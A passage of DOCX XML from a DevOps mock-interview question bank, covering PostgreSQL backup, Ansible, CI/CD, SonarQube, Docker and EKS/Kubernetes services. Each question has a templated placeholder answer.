        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Databases</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Databases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You mentioned PostgreSQL, MySQL, and MongoDB. Are you working as a DBA?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. What database-related activities have you performed, such as database migration, role management, cluster creation, backup, and restore?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Databases</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Databases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database-related activities have you performed, such as database migration, role management, cluster creation, backup, and restore?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. How do you take a backup of a PostgreSQL database?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>PostgreSQL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the PostgreSQL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take a backup of a PostgreSQL database?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. How do you restore a PostgreSQL backup?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>PostgreSQL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the PostgreSQL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restore a PostgreSQL backup?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. Have you performed backup and restore activities yourself?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>PostgreSQL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the PostgreSQL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performed backup and restore activities yourself?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. What database migration have you done, for example AWS to GCP migration?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Database Migration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Database Migration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database migration have you done, for example AWS to GCP migration?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. How do you identify long-running SQL queries?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Database Performance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Database Performance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identify long-running SQL queries?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. How do you optimize slow-running SQL queries using indexing, EXPLAIN ANALYZE, and query tuning?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Database Performance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Database Performance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optimize slow-running SQL queries using indexing, EXPLAIN ANALYZE, and query tuning?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q13. You mentioned Terraform and Ansible. Have you worked on Ansible?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Ansible</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Ansible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You mentioned Terraform and Ansible. Have you worked on Ansible?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q14. What was the purpose of using Ansible, such as VM patching, configuration management, or report generation?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Ansible</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Ansible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was the purpose of using Ansible, such as VM patching, configuration management, or report generation?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q15. Which Ansible modules have you used, such as yum, apt, service, systemd, shell, command, copy, template, file, setup, and lineinfile?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Ansible</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Ansible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Ansible modules have you used, such as yum, apt, service, systemd, shell, command, copy, template, file, setup, and lineinfile?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q16. Can you explain your Ansible playbook, including tasks, inventory, handlers, variables, and execution flow?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Ansible</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Ansible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Can you explain your Ansible playbook, including tasks, inventory, handlers, variables, and execution flow?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q17. Can you explain the CI/CD process and how it works between Development, QA, DevOps, Security, and Production?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the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Can you explain the CI/CD process and how it works between Development, QA, DevOps, Security, and Production?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q18. When developers commit code, what happens next?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the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When developers commit code, what happens next?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q19. Do you perform any scanning after every code commit?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Security Scanning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Security Scanning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 you perform any scanning after every code commit?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q20. Which tool do you use for code scanning, such as SonarQube or SonarCloud?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Security Scanning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Security Scanning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tool do you use for code scanning, such as SonarQube or SonarCloud?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q21. What does SonarQube check, including bugs, vulnerabilities, code smells, code duplication, and Quality Gates?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SonarQube</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the SonarQube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does SonarQube check, including bugs, vulnerabilities, code smells, code duplication, and Quality Gates?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q22. What happens if SonarQube Quality Gate fails?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SonarQube</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the SonarQube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happens if SonarQube Quality Gate fails?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q23. After SonarQube, what are the next stages in the CI/CD pipeline, such as build, container image creation, image scanning, push to registry, and deployment to Dev/QA/Prod?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the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After SonarQube, what are the next stages in the CI/CD pipeline, such as build, container image creation, image scanning, push to registry, and deployment to Dev/QA/Prod?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 65 - EKS Kubernetes DevOps Operations Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Tell me something about yourself.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>General</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the General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Tell me something about yourself.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. You have around 7 years of experience, right?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>General</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the General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You have around 7 years of experience, right?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Have you worked on GCP, AWS, and Azure?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Cloud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on GCP, AWS, and Azure?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Have you worked on on-prem servers or only on cloud?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Infrastructure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on on-prem servers or only on cloud?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Have you worked on EKS?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>AWS/EKS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the AWS/EKS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on EKS?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Have you launched an EKS cluster?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>AWS/EKS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the AWS/EKS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launched an EKS cluster?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Did you create the EKS cluster using Terraform, CloudFormation, or manually?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>AWS/EKS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the AWS/EKS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Did you create the EKS cluster using Terraform, CloudFormation, or manually?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Suppose an application is down. How will you identify the root cause?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Troubleshooting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Troubleshooting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Suppose an application is down. How will you identify the root cause?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. What is the difference between ADD and COPY in a Dockerfile?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Docker</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Docker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ADD and COPY in a Dockerfile?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. What is the difference between docker build and docker commit?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Docker</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Docker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docker build and docker commit?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. How can you minimize the Docker image size?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Docker</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Docker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can you minimize the Docker image size?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. What is a Headless Service?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes Services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes Services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a Headless Service?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q13. What is the default NodePort range?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes Services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes Services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default NodePort range?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q14. If NodePort gives only a port, how do you access the application? What IP do you use?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes Services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes Services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NodePort gives only a port, how do you access the application? What IP do you use?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q15. If there are 10-20 worker nodes, which node IP will you choose?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
